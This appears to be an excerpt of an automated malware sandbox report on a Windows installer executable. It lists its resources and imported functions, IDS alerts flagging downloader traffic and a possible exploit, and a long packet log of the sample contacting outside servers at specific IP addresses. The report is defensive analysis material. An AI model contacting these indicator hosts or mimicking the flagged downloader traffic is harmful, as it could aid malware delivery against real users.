RT_ICON | 0x98750 | 0xde8 | Device independent bitmap graphic, 72 x 144 x 4, image size 2592 | English | United States | 0.4393258426966292
RT_ICON | 0x99538 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.5041291291291291
RT_ICON | 0x99fa0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.7872950819672131
RT_ICON | 0x9a928 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States | 0.8375451263537906
RT_ICON | 0x9b1d0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576 | English | United States | 0.875
RT_ICON | 0x9b898 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.5682926829268292
RT_ICON | 0x9bf00 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States | 0.7890173410404624
RT_ICON | 0x9c468 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.8625886524822695
RT_ICON | 0x9c8d0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.7204301075268817
RT_ICON | 0x9cbb8 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.805327868852459
RT_ICON | 0x9cda0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.8040540540540541
RT_DIALOG | 0x9cec8 | 0x120 | data | English | United States | 0.5138888888888888
RT_DIALOG | 0x9cfe8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x9d108 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x9d1d0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x9d230 | 0x180 | Targa image data - Map 32 x 1235 x 1 +1 | English | United States | 0.5442708333333334
RT_VERSION | 0x9d3b0 | 0x260 | data | English | United States | 0.5263157894736842
RT_MANIFEST | 0x9d610 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-25T10:06:05.630649+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49714 | 80 | 192.168.2.8 | 193.122.6.168
2024-07-25T10:06:04.021229+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49711 | 80 | 192.168.2.8 | 193.122.6.168
2024-07-25T10:05:28.551868+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49709 | 40.68.123.157 | 192.168.2.8
2024-07-25T10:04:50.521072+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49707 | 40.68.123.157 | 192.168.2.8
2024-07-25T10:06:04.608960+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49713 | 443 | 192.168.2.8 | 188.114.96.3
2024-07-25T10:05:56.111324+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49710 | 443 | 192.168.2.8 | 108.167.181.251
2024-07-25T10:06:24.014341+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49726 | 443 | 192.168.2.8 | 188.114.96.3
2024-07-25T10:06:00.193954+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49711 | 80 | 192.168.2.8 | 193.122.6.168
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 10:05:55.357678890 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:55.357708931 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:55.357887030 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:55.369959116 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:55.369970083 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:55.908688068 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:55.908787966 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:55.981915951 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:55.981935978 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:55.982492924 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:55.982595921 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:55.986512899 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.028487921 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.111358881 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.111382008 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.111424923 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.111433983 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.111459017 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.111485004 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.129780054 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.129867077 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.204406023 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.204567909 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.204871893 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.204940081 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.206492901 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.206574917 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.231700897 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.231846094 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.298715115 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.298865080 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.299338102 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.299417019 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.300371885 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.300452948 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
Jul 25, 2024 10:05:56.300869942 CEST | 443 | 49710 | 108.167.181.251 | 192.168.2.8
Jul 25, 2024 10:05:56.300936937 CEST | 49710 | 443 | 192.168.2.8 | 108.167.181.251
                                              Jul 25, 2024 10:05:56.300955057 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.301017046 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.301903009 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.301980972 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.333045006 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.333110094 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.333235979 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.333291054 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.395590067 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.395668983 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.395772934 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.395838022 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.395956993 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.396020889 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.396285057 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.396339893 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.397048950 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.397115946 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.397269964 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.397322893 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.425400972 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.425517082 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.425563097 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.425616980 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.425971985 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.426038027 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.426280022 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.426357985 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.439840078 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.439951897 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.495670080 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.495733023 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.495795012 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.495807886 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.495851994 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.495877028 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.496745110 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.496818066 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.497415066 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.497488022 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.497601032 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.497715950 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.498163939 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.498226881 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.498816013 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.498898029 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.499188900 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.499265909 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.499813080 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.499877930 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.499882936 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.499896049 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.499922037 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.499960899 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.516908884 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.516925097 CEST44349710108.167.181.251192.168.2.8
                                              Jul 25, 2024 10:05:56.516947985 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.516968966 CEST49710443192.168.2.8108.167.181.251
                                              Jul 25, 2024 10:05:56.760193110 CEST4971180192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:05:56.771328926 CEST8049711193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:05:56.771506071 CEST4971180192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:05:56.773919106 CEST4971180192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:05:56.781135082 CEST8049711193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:05:58.761697054 CEST8049711193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:05:58.765474081 CEST4971180192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:05:58.771215916 CEST8049711193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:00.152548075 CEST8049711193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:00.193953991 CEST4971180192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:00.590842009 CEST49712443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:00.590873003 CEST44349712188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:00.591018915 CEST49712443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:00.592433929 CEST49712443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:00.592444897 CEST44349712188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:01.233381987 CEST44349712188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:01.233473063 CEST49712443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:01.238009930 CEST49712443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:01.238024950 CEST44349712188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:01.238464117 CEST44349712188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:01.242351055 CEST49712443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:01.284497023 CEST44349712188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:01.361238956 CEST44349712188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:01.361362934 CEST44349712188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:01.361413002 CEST49712443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:01.366820097 CEST49712443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:01.381910086 CEST4971180192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:01.391280890 CEST8049711193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:03.976849079 CEST8049711193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:03.979269981 CEST49713443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:03.979305983 CEST44349713188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:03.979378939 CEST49713443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:03.979688883 CEST49713443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:03.979700089 CEST44349713188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:04.021229029 CEST4971180192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:04.454957008 CEST44349713188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:04.456717014 CEST49713443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:04.456743956 CEST44349713188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:04.609055996 CEST44349713188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:04.609278917 CEST44349713188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:04.609352112 CEST49713443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:04.609849930 CEST49713443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:04.613101006 CEST4971180192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:04.614765882 CEST4971480192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:04.618510008 CEST8049711193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:04.618562937 CEST4971180192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:04.619607925 CEST8049714193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:04.619688034 CEST4971480192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:04.619803905 CEST4971480192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:04.624728918 CEST8049714193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:05.580435991 CEST8049714193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:05.581864119 CEST49715443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:05.581902981 CEST44349715188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:05.581975937 CEST49715443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:05.582215071 CEST49715443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:05.582226038 CEST44349715188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:05.630649090 CEST4971480192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:05.635086060 CEST8049714193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:05.635236025 CEST4971480192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:06.089751959 CEST44349715188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:06.091408968 CEST49715443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:06.091439009 CEST44349715188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:06.256828070 CEST44349715188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:06.257082939 CEST44349715188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:06.257194996 CEST49715443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:06.257493019 CEST49715443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:06.262250900 CEST4971680192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:06.267641068 CEST8049716193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:06.267724991 CEST4971680192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:06.267836094 CEST4971680192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:06.274337053 CEST8049716193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:06.897126913 CEST8049716193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:06.898381948 CEST49717443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:06.898417950 CEST44349717188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:06.898544073 CEST49717443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:06.899121046 CEST49717443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:06.899131060 CEST44349717188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:07.021254063 CEST4971680192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:07.381994963 CEST44349717188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:07.383635998 CEST49717443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:07.383651972 CEST44349717188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:07.531761885 CEST44349717188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:07.532018900 CEST44349717188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:07.532119989 CEST49717443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:07.532537937 CEST49717443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:07.585647106 CEST4971680192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:07.586716890 CEST4971880192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:07.591299057 CEST8049716193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:07.591401100 CEST4971680192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:07.591686010 CEST8049718193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:07.591758013 CEST4971880192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:07.591886044 CEST4971880192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:07.596900940 CEST8049718193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:12.174505949 CEST8049718193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:12.175736904 CEST49719443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:12.175782919 CEST44349719188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:12.175851107 CEST49719443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:12.176099062 CEST49719443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:12.176117897 CEST44349719188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:12.224400043 CEST4971880192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.705404997 CEST44349719188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:12.707060099 CEST49719443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:12.707089901 CEST44349719188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:12.845815897 CEST44349719188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:12.845913887 CEST44349719188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:12.845971107 CEST49719443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:12.846523046 CEST49719443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:12.850303888 CEST4971880192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.851268053 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.857387066 CEST8049720193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:12.857458115 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.857552052 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.860860109 CEST8049718193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:12.860914946 CEST4971880192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.862706900 CEST8049720193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:13.794564962 CEST8049720193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:13.795883894 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:13.795926094 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:13.796000004 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:13.796248913 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:13.796261072 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:13.849507093 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.252198935 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:14.253918886 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:14.253936052 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:14.386053085 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:14.386162043 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:14.386326075 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:14.387090921 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:14.392362118 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.393933058 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.399768114 CEST8049720193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:14.399857998 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.400953054 CEST8049722193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:14.401026964 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.401153088 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.406531096 CEST8049722193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:17.073066950 CEST8049722193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:17.099203110 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:17.104125977 CEST8049723193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:17.104223013 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:17.104306936 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:17.109283924 CEST8049723193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:17.130675077 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:19.733266115 CEST8049723193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:19.734102011 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:19.735603094 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:19.735686064 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:19.735824108 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:19.736109972 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:19.736129045 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:19.739500999 CEST8049722193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:19.739589930 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:19.787163019 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.217608929 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:20.219362974 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:20.219394922 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:20.343090057 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:20.343218088 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:20.343471050 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:20.343780994 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:20.346962929 CEST4972380192.168.2.8193.122.6.168
